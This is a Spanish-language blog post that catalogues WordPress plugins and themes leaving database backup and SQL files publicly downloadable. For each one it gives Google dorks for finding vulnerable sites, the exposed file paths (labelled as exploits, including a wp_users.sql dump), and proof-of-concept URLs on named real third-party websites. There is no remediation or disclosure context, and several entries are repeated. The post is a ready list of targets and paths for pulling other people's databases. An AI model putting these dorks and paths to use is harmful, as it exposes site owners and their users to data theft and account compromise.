WordPress | Temas y Plugins exponen backup de bases de datos

RedBirdRedBird 12/02/2018 05:19:00 p.m.

Temas y Plugins exponen BackUp de bases de datos



Desde hace tiempo, fueron detectas una gran cantidad de vulnerabilidades/fallos en temas y plugins de WordPress los cuales exponen los BackUp de bases de sitios.

En este post, recopilamos una gran cantidad de estos, con Dorks, PoC, y mas informacion de cada fallo.

WordPress user-spam-remover [PLUGINS]

[*] Dorks : inurl:''/wp-content/plugins/user-spam-remover/''
[*] Admin Panel Login Path : /wp-login.php 
[*] Exploit : /wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
[*] PoC: howafrica.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

WordPress Delme Plugins 3.0

[*] Dork:  inurl:''/wp-content/plugins/delme/admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql #
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql


WordPress Delme Themes 3.0

[*] Dorks : inurl:''/wp-content/plugins/delme/admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql 

WordPress wp-contactpage-designer Plugins

[*] Dorks : inurl:''/wp-content/plugins/wp-contactpage-designer/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_templates.sql
[*] PoC: mansfieldhistoricalsociety.com.au/wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql

WordPress zerotolaunch Plugins

[*] Dorks : inurl:''/wp-content/plugins/zerotolaunch/''
[*] Admin Panel Login Path : /wp-login.php # Exploit :
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql 
  • /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql 
  • /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[*] PoC: ilovevitiligo.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql


WordPress rss-feed-post-generator-echo Plugins

[*] Dorks : inurl:''/wp-content/plugins/rss-feed-post-generator-echo/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql
[*] PoC: metropolisradio.gr/wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql

WordPress Universal Post Manager 1.5.0

[*] Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''
[*] Exploit :
  • /wp-content/plugins/universal-post-manager/db/db.sql /PATH
  • /wp-content/plugins/universal-post-manager/db/db.sql
  • /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
  • /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
  • /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
[*] PoC: unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql

WordPress wp-contactpage-designer Plugins

[*] Google Dorks : inurl:''/wp-content/plugins/wp-contactpage-designer/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_templates.sql
[*] PoC: mansfieldhistoricalsociety.com.au/wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql


WordPress paid-memberships-pro Plugins 1.5.2

[*] Google Dorks : inurl:''/wp-content/plugins/paid-memberships-pro/''
[*] Admin Panel Login Path: /wp-login.php
[*] Exploit : /wp-content/plugins/paid-memberships-pro/includes/setup.sql
[*] PoC: naswithnotepads.com/community/wp-content/plugins/paid-memberships-pro/includes/setup.sql

WordPress Pods Plugins 2.7.9

[*] Google Dorks : inurl:/wp-content/plugins/pods/
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/pods/sql/dump.sql
[*] PoC: oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql


WordPress CherryFramework Themes 3.1.4

[*] Google Dork: inurl:/wp-content/themes/CherryFramework
[*] Exploit: wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
[*] PoC: https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php 

WordPress universal-post-manager 1.5.0 Plugin

[*] Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/universal-post-manager/db/db.sql
  • /PATH/wp-content/plugins/universal-post-manager/db/db.sql
  • /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
  • /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
  • /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql 
[*] PoC: unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql

WordPress wp-editor Plugins

[*] Google Dork : inurl:''/wp-content/plugins/wp-editor/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/wp-editor/sql/database.sql
  • /wp-content/plugins/wp-editor/sql/uninstall.sql
  • /PATH/wp-content/plugins/wp-editor/sql/database.sql
  • /PATH/wp-content/plugins/wp-editor/sql/uninstall.sql
[*] PoC: symev.org/wp-content/plugins/wp-editor/sql/database.sql

WordPress TemplateOne Themes Dubicars

[*] Dorks :
  • inurl:''/wp-content/themes/templateone/''
  • intext:''© Copyright 2015 | Powered by Dubicars''
  • intext:''© Copyright 2017 | Powered by Dubicars''
  • intext:''© Copyright 2018 | Powered by Dubicars''
  • intext:''Powered by Dubicars''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/themes/templateone/db.sql
[*] simurghcars.ae/wp-content/themes/templateone/db.sql

WordPress wp-backup-plus Plugin

[*] Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
[*] Admin Panel Login Path : /wp-login.php 
[*] Exploit : 
  • /wp-content/uploads/wp-backup-plus/temp/database.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_comments.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_links.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pls.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_terms.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_users.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql 
[*] PoC:  wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql

WordPress Absolutely Glamorous Custom Admin ag-custom-admin Plugin

[*] Dork : inurl:''/wp-content/plugins/ag-custom-admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[*] PoC: restaurant-le-lautrec.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql

WordPress Education Theme on Genesis Framework 2018 

[*] Dork : intext:''Copyright © 2018 ·Education Theme on Genesis Framework · WordPress''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql [*] PoC: kennethsenglish.com/wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql

Publicar un comentario

0 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?

¡SUSCRIBETE AHORA!